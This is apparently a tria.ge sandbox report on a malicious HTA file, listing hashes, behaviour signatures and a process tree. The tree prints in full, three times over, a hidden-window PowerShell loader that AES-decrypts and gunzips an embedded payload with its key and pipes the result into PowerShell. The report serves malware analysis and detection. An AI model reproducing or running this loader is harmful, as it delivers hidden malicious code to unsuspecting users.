Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    14/06/2024, 14:02

General

  • Target

    opituvannya.hta

  • Size

    62KB

  • MD5

    c708f14c2f52a4dc08397830f236756c

  • SHA1

    4ac6a85dd75482792aaf1bd5926f0fadb3294076

  • SHA256

    82f62251ab3149595cbbb8650c9751965643deb0b94bf072378d2995b578d67e

  • SHA512

    46c4826e3f06ed0e40f41a9d1ea7f9c355141cf8574f5f7742b47694aa7b9815b1019a952f2be196ee365f89ae2c367c719c680509c74e281d903be63d046a6c

  • SSDEEP

    768:knAQQXYSMpqVHKkwIMU+B8sbo11HKZOzfUwM:eAQiYSMpmqk6pBW11HNMwM

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\opituvannya.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2188
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $OrYH = 'AAAAAAAAAAAAAAAAAAAAADkCvmL9BPeiT7j5FHFntpVBTonWV0j9CtjNhVif3l4FEwM1YmdCoCarRAOr9KMAUamrrwz4zDixCguii22J/SXiH22mWewKL37cdXp3c8xgAmUJg3M61JCvhmjElrLRsv/kl/maw4E1glvS0dHWZneFS+4PYKbbsHyPFRoNifGVL7fcfQqqoA17J2qzRwtWEZiNeS1tONXJqnX4mC87oCGna+5FZv8aFhw7tASa0GrFFP/+GuvcRmsDh5Ec0pT6DkCL0aLUwrEh8hH2NbNHISk8szOFEyHif1FTSzEhvFXnqybydixxmjwqvAttKPZJm9iJe8V4HHukoE26h8cNH5BzLFr7puQaQe/D1jnwFDlY8AYT2L5FRSLpOovWkwmdUgQAcBXa/kEaGx/845j56POTgHp3GtcPqr0mNB/W/YojdkksdNeiMg31GhxtAygFWklxn9zujBdYHlUI0izU8lYzXMUx2cmBO2knuMWbWaW3OAmD3s8W/p0kWtJLx0lvFOvUJtItJDNoXvO3X4wylZP3NCUFwg/nhj4qx2IVXJFHBH/+g+h4UvSgwRTL7Nu9OlUauiRPvdFeFjFZ4rP5XQnPQRBH/JtFFNBcwcQpSFb+6lgyi6ttX7MVDY+qsmzME7xYf6oUgRmG+ioaT/0TdhQjz74mcTwhgzEcxyNUapzu/SI0YwDXXkXsACDrxXk2I5U5hz528u2wGEnvZVTvhOFmPABj5giVwHx+CYVNIFubZBPVv3aStSeinJ5ycT3SK/Je+RaFAcZ8SlcAWguuc5OgVvRAcX5dK8VgCcswmbgUpduIfbvt2Ik40+4g+7R/Ay5OUE1vYy7cbX8h+WIZWMJJ+OPXBalEcbzI9fExNqVGa28c9/zitEZgWUiikYHTy+og5r7lspOLBrGHR8USqeAjebGkujOneulUFK0Wsl24UG84KQLA5758N3S9SXjgCf7LY7qyuCc27iixb55tZU7yG5ClZe6sfUJZqsAq+k0mzXVE3niNI1d4Bw56Fpr+HKh4vzMGo36evhjWS+KG9HyyuVO1xJ1XmlhyL5Aej8B73btSStvXebsWSiBsfBmPnomnHvvPTOQaivuP1bcvj/xGGk5+M4MKgSLipz0UC32Qep3Bp7tFAHyARpf2/15pV6+Pwg956ln8xBomGL2DHRs20MpWsIMaEXnLd4lor0ymTVIndcpHPNaly6DrL7TVwi2+30JPQqKDyhxSijvE/WyM12Zuf4/9SJGLg78xdetz2439qM9qVyBDL84v5rQ2DdPI8IIvdELYBg26l2tVdktH7m5RFodmlUSaIFKIgKAw9ISlp78dZBkq5dNw9UZAHPOcJj+wfLojn9nwctWTaSEuqg94i97EuaE20OH0DHw23qthbgTDZm8hOTNymwNe/Icc2lspfAGSNMxdnqDCXxnafZnhQaAT6Bygz5Dft7WVQYeKWKe5Uq4ZKiYkbV9NUQ==';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp | powershell - }
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $OrYH = 'AAAAAAAAAAAAAAAAAAAAADkCvmL9BPeiT7j5FHFntpVBTonWV0j9CtjNhVif3l4FEwM1YmdCoCarRAOr9KMAUamrrwz4zDixCguii22J/SXiH22mWewKL37cdXp3c8xgAmUJg3M61JCvhmjElrLRsv/kl/maw4E1glvS0dHWZneFS+4PYKbbsHyPFRoNifGVL7fcfQqqoA17J2qzRwtWEZiNeS1tONXJqnX4mC87oCGna+5FZv8aFhw7tASa0GrFFP/+GuvcRmsDh5Ec0pT6DkCL0aLUwrEh8hH2NbNHISk8szOFEyHif1FTSzEhvFXnqybydixxmjwqvAttKPZJm9iJe8V4HHukoE26h8cNH5BzLFr7puQaQe/D1jnwFDlY8AYT2L5FRSLpOovWkwmdUgQAcBXa/kEaGx/845j56POTgHp3GtcPqr0mNB/W/YojdkksdNeiMg31GhxtAygFWklxn9zujBdYHlUI0izU8lYzXMUx2cmBO2knuMWbWaW3OAmD3s8W/p0kWtJLx0lvFOvUJtItJDNoXvO3X4wylZP3NCUFwg/nhj4qx2IVXJFHBH/+g+h4UvSgwRTL7Nu9OlUauiRPvdFeFjFZ4rP5XQnPQRBH/JtFFNBcwcQpSFb+6lgyi6ttX7MVDY+qsmzME7xYf6oUgRmG+ioaT/0TdhQjz74mcTwhgzEcxyNUapzu/SI0YwDXXkXsACDrxXk2I5U5hz528u2wGEnvZVTvhOFmPABj5giVwHx+CYVNIFubZBPVv3aStSeinJ5ycT3SK/Je+RaFAcZ8SlcAWguuc5OgVvRAcX5dK8VgCcswmbgUpduIfbvt2Ik40+4g+7R/Ay5OUE1vYy7cbX8h+WIZWMJJ+OPXBalEcbzI9fExNqVGa28c9/zitEZgWUiikYHTy+og5r7lspOLBrGHR8USqeAjebGkujOneulUFK0Wsl24UG84KQLA5758N3S9SXjgCf7LY7qyuCc27iixb55tZU7yG5ClZe6sfUJZqsAq+k0mzXVE3niNI1d4Bw56Fpr+HKh4vzMGo36evhjWS+KG9HyyuVO1xJ1XmlhyL5Aej8B73btSStvXebsWSiBsfBmPnomnHvvPTOQaivuP1bcvj/xGGk5+M4MKgSLipz0UC32Qep3Bp7tFAHyARpf2/15pV6+Pwg956ln8xBomGL2DHRs20MpWsIMaEXnLd4lor0ymTVIndcpHPNaly6DrL7TVwi2+30JPQqKDyhxSijvE/WyM12Zuf4/9SJGLg78xdetz2439qM9qVyBDL84v5rQ2DdPI8IIvdELYBg26l2tVdktH7m5RFodmlUSaIFKIgKAw9ISlp78dZBkq5dNw9UZAHPOcJj+wfLojn9nwctWTaSEuqg94i97EuaE20OH0DHw23qthbgTDZm8hOTNymwNe/Icc2lspfAGSNMxdnqDCXxnafZnhQaAT6Bygz5Dft7WVQYeKWKe5Uq4ZKiYkbV9NUQ==';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3060
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $OrYH = 'AAAAAAAAAAAAAAAAAAAAADkCvmL9BPeiT7j5FHFntpVBTonWV0j9CtjNhVif3l4FEwM1YmdCoCarRAOr9KMAUamrrwz4zDixCguii22J/SXiH22mWewKL37cdXp3c8xgAmUJg3M61JCvhmjElrLRsv/kl/maw4E1glvS0dHWZneFS+4PYKbbsHyPFRoNifGVL7fcfQqqoA17J2qzRwtWEZiNeS1tONXJqnX4mC87oCGna+5FZv8aFhw7tASa0GrFFP/+GuvcRmsDh5Ec0pT6DkCL0aLUwrEh8hH2NbNHISk8szOFEyHif1FTSzEhvFXnqybydixxmjwqvAttKPZJm9iJe8V4HHukoE26h8cNH5BzLFr7puQaQe/D1jnwFDlY8AYT2L5FRSLpOovWkwmdUgQAcBXa/kEaGx/845j56POTgHp3GtcPqr0mNB/W/YojdkksdNeiMg31GhxtAygFWklxn9zujBdYHlUI0izU8lYzXMUx2cmBO2knuMWbWaW3OAmD3s8W/p0kWtJLx0lvFOvUJtItJDNoXvO3X4wylZP3NCUFwg/nhj4qx2IVXJFHBH/+g+h4UvSgwRTL7Nu9OlUauiRPvdFeFjFZ4rP5XQnPQRBH/JtFFNBcwcQpSFb+6lgyi6ttX7MVDY+qsmzME7xYf6oUgRmG+ioaT/0TdhQjz74mcTwhgzEcxyNUapzu/SI0YwDXXkXsACDrxXk2I5U5hz528u2wGEnvZVTvhOFmPABj5giVwHx+CYVNIFubZBPVv3aStSeinJ5ycT3SK/Je+RaFAcZ8SlcAWguuc5OgVvRAcX5dK8VgCcswmbgUpduIfbvt2Ik40+4g+7R/Ay5OUE1vYy7cbX8h+WIZWMJJ+OPXBalEcbzI9fExNqVGa28c9/zitEZgWUiikYHTy+og5r7lspOLBrGHR8USqeAjebGkujOneulUFK0Wsl24UG84KQLA5758N3S9SXjgCf7LY7qyuCc27iixb55tZU7yG5ClZe6sfUJZqsAq+k0mzXVE3niNI1d4Bw56Fpr+HKh4vzMGo36evhjWS+KG9HyyuVO1xJ1XmlhyL5Aej8B73btSStvXebsWSiBsfBmPnomnHvvPTOQaivuP1bcvj/xGGk5+M4MKgSLipz0UC32Qep3Bp7tFAHyARpf2/15pV6+Pwg956ln8xBomGL2DHRs20MpWsIMaEXnLd4lor0ymTVIndcpHPNaly6DrL7TVwi2+30JPQqKDyhxSijvE/WyM12Zuf4/9SJGLg78xdetz2439qM9qVyBDL84v5rQ2DdPI8IIvdELYBg26l2tVdktH7m5RFodmlUSaIFKIgKAw9ISlp78dZBkq5dNw9UZAHPOcJj+wfLojn9nwctWTaSEuqg94i97EuaE20OH0DHw23qthbgTDZm8hOTNymwNe/Icc2lspfAGSNMxdnqDCXxnafZnhQaAT6Bygz5Dft7WVQYeKWKe5Uq4ZKiYkbV9NUQ==';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2476

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    6b0531ba3462460fd0b88c33e6f11d6d

    SHA1

    bdd2835eb040927a5320a2fa998a3aa4a5ef9d01

    SHA256

    53ec09c0f03b2bba78ae154029cf9c2db4b070af114c129c336171fcca6d65b2

    SHA512

    96faafd1bbaa9535b14962e87e78db1e770ec7b69847aaf0cfca903c286f3016b2667cc4577f0603bbdd787c82dedb330bc6cb6018c30b1b5f85046649e79d3f